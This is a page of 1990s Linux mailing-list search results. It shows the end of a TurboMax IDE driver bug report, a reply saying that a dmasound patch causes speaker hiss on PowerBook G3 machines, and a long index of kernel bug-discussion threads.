hde: Maxtor 91728D8, ATA DISK drive
hdg: Maxtor 91728D8, ATA DISK drive
ide0 at 0xd4831000-0xd4831007,0xd4831160 on irq 13
ide1 at 0xd4835000-0xd4835007,0xd4835160 on irq 13 (shared with ide0)
ide2 at 0xfe000440-0xfe000447,0xfe000432 on irq 24
ide3 at 0xfe000420-0xfe000427,0xfe000412 on irq 24 (shared with ide2)
hda: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hdc: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hde: Maxtor 91728D8, 16479MB w/512kB Cache, CHS=33483/16/63, UDMA
hdg: Maxtor 91728D8, 16479MB w/512kB Cache, CHS=33483/16/63, UDMA


The 2.2.1 kernel, which does not detect the TurboMax card, detects the cdrom
at hdc correctly.

hda: QUANTUM FIREBALL ST4300A, ATA DISK drive
hdc: MATSHITA CR-585, ATAPI CDROM drive
ide0 at 0xd4831000-0xd4831007,0xd4831160 on irq 13
ide1 at 0xd4835000-0xd4835007,0xd4835160 on irq 14
hda: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hdc: ATAPI 1X CD-ROM drive, 4224kB Cache
Uniform CDROM driver Revision: 2.54


If this list is not the correct place to report this bug, please tell me where.

Thanks,
Brian


^ permalink raw reply	[relevance 59%]

* Re: patch for dmasound bug
  1999-06-02 20:05 64% patch for dmasound bug Ryan Nielsen
@ 1999-06-10 22:56 63% ` Alvin Brattli
  0 siblings, 0 replies; 200+ results
From: Alvin Brattli @ 1999-06-10 22:56 UTC (permalink / raw)
  To: Ryan Nielsen; +Cc: linuxppc-dev



OK, this reply comes a bit late, but I didn't try the patch
until now, so here goes:

Ryan Nielsen:
>
>This restores the rate/byteswap to normal after playing a beep
>if you for example stop timidity, make a beep, resume, the sound
>will be slower than normal (without this patch).

Although this patch might do what it was intended for, it has some
unwanted consequences on the PowerBook G3 Series, namely that one gets a
constant, really annoying hiss from the loudspeakers, most notably
during the boot sequence.  Without this patch, the hiss stops after a
system beep (like when you do an "echo ^G" in a shell), but now even
this does not help.  So, if this patch is included in the standard
distribution, I suspect we will hear a lot of complaints from PowerBook
G3 users.

To me, it seems like there is something wrong in the dmasound driver
that causes this hiss; it just doesn't switch off all sound when it's
supposed to.  I don't know enough about the workings of the audio
controller to go bug hunting here myself, so all I can do is just point
out that there is a problem here :(

>--- linux/drivers/sound/dmasound.c	1999/02/05 05:45:42	1.41
>+++ linux/drivers/sound/dmasound.c	1999/06/02 19:42:08
>@@ -3255,6 +3255,11 @@
> 	save_flags(flags); cli();
> 	if (beep_playing) {
> 		st_le16(&beep_dbdma_cmd->command, DBDMA_STOP);
>+		out_le32(&awacs_txdma->control, (RUN|PAUSE|FLUSH|WAKE) << 16);
>+		out_le32(&awacs->control,
>+			 (in_le32(&awacs->control) & ~0x1f00)
>+			 | (awacs_rate_index << 8));
>+		out_le32(&awacs->byteswap, sound.hard.format != AFMT_S16_BE);
> 		beep_playing = 0;
> 	}
> 	restore_flags(flags);



aLViN
-- 
:r .signature

^ permalink raw reply	[relevance 63%]

Results 1-200 of ~385150   | reverse | options above
-- pct% links below jump to the message on this page, permalinks otherwise --
1996-08-14 22:58 64% bug in IRIX tftpd? David S. Miller
1996-08-14 23:46 64% ignore tftp bug report David S. Miller
1997-07-05 21:09 64% GCC bug Ralf Baechle
1997-08-10  2:06 64% Bottom half bug Ralf Baechle
1997-08-11 23:59 64% ` Miguel de Icaza
1997-08-12  4:07       ` Ralf Baechle
1997-08-12  4:07 64%     ` Ralf Baechle
1997-08-12  4:07 64%       ` Ralf Baechle
1997-08-12 16:26           ` Miguel de Icaza
1997-08-12 16:26 64%         ` Miguel de Icaza
1997-08-12 16:26 64%           ` Miguel de Icaza
1997-09-24  7:15 64% glibc 2.0.4 bug Ralf Baechle
1997-09-24 17:16 64% ` Ulrich Drepper
1997-10-14 23:58 64% static rpm bug, dynamic linker Ralf Baechle
1997-11-14 21:17     Pentium F00F bug Linux workaround Ariel Faigon
1997-11-14 21:17 55% ` Ariel Faigon
1997-11-14 21:17 55%   ` Ariel Faigon
1997-11-14 21:49 64%   ` David S. Miller
1997-11-14 22:01 64%   ` ralf
1997-11-14 22:25 45%   ` Alan Cox
1997-11-17 21:28     Pentium F00F bug Linux workaround; BSDI Response William Fisher
1997-11-17 21:28 50% ` William Fisher
1997-11-17 21:28 51%   ` William Fisher
1997-11-17 23:23 64%   ` David S. Miller
1997-11-17 23:56 64%     ` Alan Cox
1997-11-17 23:56 64%       ` Alan Cox
     [not found]     <19971205123800.34650@odo.amherst.com>
1997-12-06  6:16 64% ` Bug - Re: memleak 'DeLuxe' detector, 2.0.32, patch MOLNAR Ingo
1998-03-23 19:08 64% BIG FAT BUG with free_memory_available() Rik van Riel
1998-03-24 23:03 64% free_memory_available() bug in pre-91-1 H.H.vanRiel
1998-03-25 23:40 64% ` Linus Torvalds
1998-03-26  9:08 64%   ` Rik van Riel
1998-04-03 22:11     fwd: Andreessen Sees Mozilla-Linux Upset Of Windows ralf
1998-04-04 16:30 64% ` bug Ulf Carlsson
1998-04-04 15:59 64%   ` bug ralf
1998-05-13 17:10 64% Wrong 'w' and 'ps' (bug in procps?) Stephan van Hienen
1998-05-14  8:22 64% ` David S. Miller
1998-05-27  2:26 64% Assembler bug ralf
1998-06-03 17:56 63% Bug in do_munmap (fwd) Rik van Riel
1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
1998-06-15 22:44 54% Linux de4x5 driver bug? Mark J. Steiglitz
1998-07-10 19:49 64% GCC bug ralf
1998-09-04 18:51 64% Bug Ulf Carlsson
1998-09-04 21:25 64% ` Bug ralf
1998-10-20 23:50 61% Haifa scheduler bug in egcs 1.0.2 ralf
     [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
1998-10-22  0:44 62%   ` ralf
1998-10-22  6:26     (fwd) was bug in haifa scheduler (or not) Ariel Faigon
1998-10-22  6:26 64% ` Ariel Faigon
1998-10-22  6:26 64%   ` Ariel Faigon
1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
1999-01-15  2:18 63% ` David A. Gatwood
1999-01-15  3:30 64% ` Brad Midgley
1999-01-15  3:31 64% ` Paul Mackerras
1999-01-15 18:34 63%   ` David A. Gatwood
1998-12-02 20:36 64% [BUG] arp replies with BOOTP (nfsroot) Oren Laadan
1998-12-03 16:20 62% ` [BUG] arp replies with BOOTP [more info] Oren Laadan
1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
1998-12-27 17:59 64% ` Hollis R Blanchard
1998-12-28  4:07 64%   ` David Edelsohn
1998-12-27 19:13 64% ` David Edelsohn
1998-12-27 20:29 64%   ` Jens Ch. Restemeier
1998-12-28  4:19 64%     ` David Edelsohn
     [not found]     <199812290146.BAA12687@terrorserver.swansea.linux.org.uk>
1998-12-31 18:00 35% ` 2.2.0 Bug summary Andrea Arcangeli
1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
1999-01-01  0:16 64%     ` Steve Bergman
1999-01-01 17:16 64%       ` Andrea Arcangeli
1999-01-01 16:44 51%     ` Andrea Arcangeli
1999-01-01 20:02 38%       ` Andrea Arcangeli
1999-01-01 23:46 64%         ` Steve Bergman
1999-01-02  6:55 46%           ` Linus Torvalds
1999-01-02  8:33 62%             ` Steve Bergman
1999-01-02 14:48 64%             ` Andrea Arcangeli
1999-01-02 15:38 42%             ` Andrea Arcangeli
1999-01-02 18:10 64%               ` Linus Torvalds
1999-01-02 20:52 31%               ` Andrea Arcangeli
1999-01-03  2:59 32%                 ` Andrea Arcangeli
1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
1999-01-04 20:56 62%                     ` Linus Torvalds
1999-01-04 21:10 64%                       ` Rik van Riel
1999-01-04 22:04 64%                       ` Alan Cox
1999-01-04 21:55 64%                         ` Linus Torvalds
1999-01-04 22:51 64%                           ` Andrea Arcangeli
1999-01-05  0:32 30%                             ` Andrea Arcangeli
1999-01-05  0:52 64%                               ` Zlatko Calusic
1999-01-05  3:02 64%                               ` Zlatko Calusic
1999-01-05 11:49 64%                                 ` Andrea Arcangeli
1999-01-05 13:23 62%                                   ` Zlatko Calusic
1999-01-05 15:42 64%                                     ` Andrea Arcangeli
1999-01-05 16:16 59%                                       ` Zlatko Calusic
1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
1999-01-06 14:48 63%                                 ` Andrea Arcangeli
1999-01-06 23:31 58%                                   ` Andrea Arcangeli
1999-01-06 23:35 64%                                   ` Linus Torvalds
1999-01-07  4:30 62%                                     ` Eric W. Biederman
1999-01-07 17:56 48%                                       ` Linus Torvalds
1999-01-07 18:18 61%                                         ` Rik van Riel
1999-01-07 18:55 59%                                         ` Zlatko Calusic
1999-01-07 22:57 62%                                         ` Linus Torvalds
1999-01-08  1:16 60%                                           ` Linus Torvalds
1999-01-08 10:45 50%                                             ` Andrea Arcangeli
1999-01-08 19:06 64%                                               ` Linus Torvalds
1999-01-08  2:56 54%                                         ` Eric W. Biederman
1999-01-09  0:50 60%                                         ` David S. Miller
1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
1999-01-09  2:34 64%                                           ` Andrea Arcangeli
1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
1999-01-09 12:11 64%                                           ` Andrea Arcangeli
1999-01-07 14:11 45%                                     ` Andrea Arcangeli
1999-01-07 18:19 55%                                       ` Linus Torvalds
1999-01-07 20:35 64%                                         ` Andrea Arcangeli
1999-01-07 23:51 64%                                           ` Linus Torvalds
1999-01-08  0:04 64%                                             ` Andrea Arcangeli
1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
1999-01-04 22:29 64%                       ` Andrea Arcangeli
1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
1999-01-02 20:04 64%             ` Steve Bergman
1999-01-02  3:03 38%         ` Andrea Arcangeli
1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
1999-01-01 19:44 64% ` Tom Rini
1999-01-02  9:31 64%   ` Jens Ch. Restemeier
1999-01-02  0:47 64% ` Ian K. Erickson
1999-01-03 22:00 64% Bug in the mmap code? Eric W. Biederman
1999-01-03 22:36 64% ` Eric W. Biederman
1999-01-07 15:53 64% a bug report radium
1999-01-08 23:47 64% ` Anton Blanchard
1999-01-13 17:43 59% [PATCH] Fix for swapin bug Stephen C. Tweedie
1999-01-13 19:42 64% Pre-R5 installer, some bug fixes Duncan Mak
1999-01-14 22:41 64% Bug in macserial.c Benjamin Herrenschmidt
1999-01-18 20:26     Removing swap lockmap Andrea Arcangeli
1999-01-18 22:24 64% ` BUG: deadlock in swap lockmap handling Alan Cox
     [not found]     <990119214302.n0001113.ph@mail.clara.net>
1999-01-27 23:55 59% ` Fwd: Inoffensive bug in mm/page_alloc.c Paul Hamshere
1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
1999-01-28 14:01 64% AWACS Bug Russell Hires
1999-02-02  4:53 64% ` Paul Mackerras
1999-01-28 19:03 62% Trevor Woerner
1999-01-30 15:05 64% bug in arch/ppc/mm/init.c Loic Prylli
1999-03-03  5:19 64% ` Paul Mackerras
1999-01-31 20:21 60% BUG in dmasound.c, allocating buffers Scott Sams
1999-02-03  2:23 63% CDROM driver bug? Sean Harding
1999-02-07 18:21 64% swapcache bug? Manfred Spraul
1999-02-07 21:30 64% ` Eric W. Biederman
1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
1999-02-08 17:32 64%   ` Linus Torvalds
1999-02-08 17:51 60%     ` Stephen C. Tweedie
1999-02-08 18:48 62%       ` Linus Torvalds
1999-02-08 21:13 60%         ` Matti Aarnio
1999-02-09  7:15 64%         ` Eric W. Biederman
1999-02-09 16:32 64%           ` Linus Torvalds
1999-02-10  0:28 55%             ` Eric W. Biederman
     [not found]     <199902071436.PAA11929@sparta.research.kpn.com>
1999-02-08  5:12 64% ` MIPS egcs bug, was: working modutils for DECStation Linux ?? ralf
1999-02-14 22:50 64% Linux 2.2.1 and 2.2.0-pre5 bug ralf
1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
1999-02-20 12:14 64% ` Neil Booth
1999-02-27  2:39 64%   ` Neil Booth
1999-02-22 20:31 64% ` Kanoj Sarcar
1999-02-25  0:47 64% ` Andrea Arcangeli
     [not found]     <Pine.LNX.4.05.9902220432430.2138-100000@localhost.erols.com>
1999-02-22 14:36 64% ` egcs-1.1.1-1c bug (was Re: major ksyms problem) Tom Vier
1999-02-23  7:22 64%   ` Gary Thomas
1999-02-23 12:24 64%     ` Tom Vier
1999-02-23 20:53 64%       ` Tom Vier
     [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
1999-02-23 15:00 64%   ` Franz Sirl
1999-02-23 21:06 64%     ` Tom Vier
1999-02-23 21:15 64%       ` Franz Sirl
1999-02-24  9:53 64%         ` Gary Thomas
1999-02-24 16:06 64%           ` Franz Sirl
1999-02-25  2:20 64%           ` Tom Vier
1999-02-24 18:40 64%         ` Tom Vier
1999-02-24  7:14 64%       ` Michel Lanners
1999-02-22 14:36 59% I believe I found a bug in /arch/ppc/kernel/signal.c D.J. Barrow
1999-02-22 18:53 64% ` Benjamin Herrenschmidt
1999-02-23 14:35 64%   ` Lauro Whately
1999-02-24 12:45 64% D.J. Barrow
1999-02-25 11:39 57% signal handling bug demo D.J. Barrow
1999-02-26 16:13 64% Bug in G3 serial - stty causes total lockup puetzk6715
1999-03-31 20:14 64% [linux-lvm] Bug in the Major number increments? FryarD
1999-04-01 15:18 53% Bug in LinuxThreads? Charles A. Jolley
1999-04-01 18:57 64% ` Kevin B. Hendricks
1999-04-06 16:31 64% HAL2 spec bug Ulf Carlsson
1999-04-22  0:12 64% boundary condition bug fix for vmalloc() Kanoj Sarcar
1999-04-22 15:30 64% ` Patch: " Stephen C. Tweedie
1999-05-08 12:20 63% [BUG] in glibc-2.1.1-6b: gethostbyname broken Martin Costabel
1999-05-09 22:20 64% ` Franz Sirl
1999-05-10 18:56 64% Indy SC bug Ulf Carlsson
     [not found]     <Pine.LNX.4.03.9905111114210.19954-100000@baltimore.wwaves.com>
1999-05-11 21:30 61% ` Swap Questions (includes possible bug) - swapfile.c / swap.c Rik van Riel
1999-05-12 15:42 58%   ` [PATCH] " Joseph Pranevich
1999-05-12 10:30 64% Manfred Spraul
1999-05-12 18:36 64% ` Stephen C. Tweedie
1999-05-12 19:45 44%   ` Manfred Spraul
     [not found]     <Pine.LNX.3.96.990515232120.14004A-101000@artax.karlin.mff.cuni.cz>
1999-05-16  4:40 35% ` [FYI][RFC] Way to deal with filesystems with jumping pieces of inodes (was Re: HPFS bug in lookup()) Alexander Viro
1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
1999-05-19 20:56 64% ` Brad Boyer
1999-05-19 21:04 64% ` Hartmut Koptein
1999-05-19 21:26 64% ` Franz Sirl
1999-05-24 22:00 64% AWACS Bug Scott Sams
1999-05-25 10:42 64% ` Benjamin Herrenschmidt
     [not found]     <Pine.GSO.4.05.9905251646130.14882-100000@mail.wesleyan.edu>
1999-05-27  4:42 64% ` Scott Sams
1999-05-27  5:19 58%   ` Jason Y. Sproul
1999-05-27 18:25     Problems with vger 2.3.3/4 Martin Costabel
1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
1999-06-03  1:24 64%   ` Ryuichi Oikawa
1999-06-03  2:50 64%   ` Paul Mackerras
1999-06-03  6:26 64%     ` Martin Costabel
1999-06-03 22:24 64%     ` Martin Costabel
1999-06-02 20:05 64% patch for dmasound bug Ryan Nielsen
1999-06-10 22:56 63% ` Alvin Brattli
1999-06-07  8:54 64% Bug report Alexander Larsson
1999-06-07 13:53 64% ` Dan Malek
     [not found]     <E10r9LE-0006v4-00@the-village.bc.nu>
1999-06-09  1:10 64% ` [PATCH] Re: Bug: Tracing recursive system calls Nate Eldredge
1999-06-09  3:28 59% TurboMax driver bug Brian C Burke
